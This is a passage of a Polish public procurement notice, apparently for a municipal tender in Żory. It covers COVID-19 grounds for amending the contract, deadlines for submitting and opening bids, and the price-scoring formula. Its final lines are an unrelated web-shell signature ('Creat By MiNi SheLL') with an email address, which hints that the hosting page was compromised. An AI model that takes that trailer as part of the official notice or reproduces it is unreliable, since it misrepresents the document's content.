Pzp. Wydłużenie terminu realizacji zamówienia o tyle dni ile trwało wykonanie dodatkowych prac projektowych.<br/>5.	Zgłoszony przez Wykonawcę i potwierdzony przez Zamawiającego wpływ COVID-19 na należyte wykonanie umowy dotyczące w szczególności: <br/>1) nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie niż stosunek pracy, które uczestniczą lub mogłyby uczestniczyć w realizacji zamówienia; <br/>2) decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem COVID-19, nakładających na wykonawcę obowiązek <br/>podjęcia określonych czynności zapobiegawczych lub kontrolnych; <br/>3) poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady Ministrów, związanych z przeciwdziałaniem COVID-19, o których mowa w art. 11 ust. 1-3 ustawy z 2.03.2020r o szczególnych rozwiązaniach<br/>związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych Dz.tJ.2020 poz. 374 ze zm.<br/>4) wstrzymania dostaw produktów, komponentów produktu lub materiałów, trudności w dostępie do sprzętu lub trudności w realizacji usług transportowych;<br/>5) innych okoliczności, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość wykonania umowy;<br/>6) okoliczności, o których mowa w pkt 1-5, w zakresie w jakim dotyczą one podwykonawcy lub dalszego podwykonawcy.<br/>Zmiana umowy w szczególności poprzez: <br/>1) zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy lub jej części,<br/>2) zmianę sposobu wykonywania dostaw, usług lub robót budowlanych, <br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia wynagrodzenia wykonawcy, o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami tylko w formie elektronicznej (podpisaną jednym z podpisów: kwalifikowanym, zaufanym, osobistym) za pośrednictwem platformy zakupowej pod adresem: https://zory.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-08 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Sprecyzowanie kryteriów oceny ofert: <br/>1) w kryterium, w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik, tj. cena – zostanie zastosowany następujący wzór arytmetyczny:<br/>(n : b) x 100<br/>Oferta z najniższą ceną otrzyma 100 punktów, pozostałe proporcjonalnie mniej, gdzie: <br/>a) n - wartość oferty z najmniejszą wartością, <br/>b) b - wartość oferty badanej, <br/>c) 100 – wskaźnik stały

Creat By MiNi SheLL
Email: jattceo@gmail.com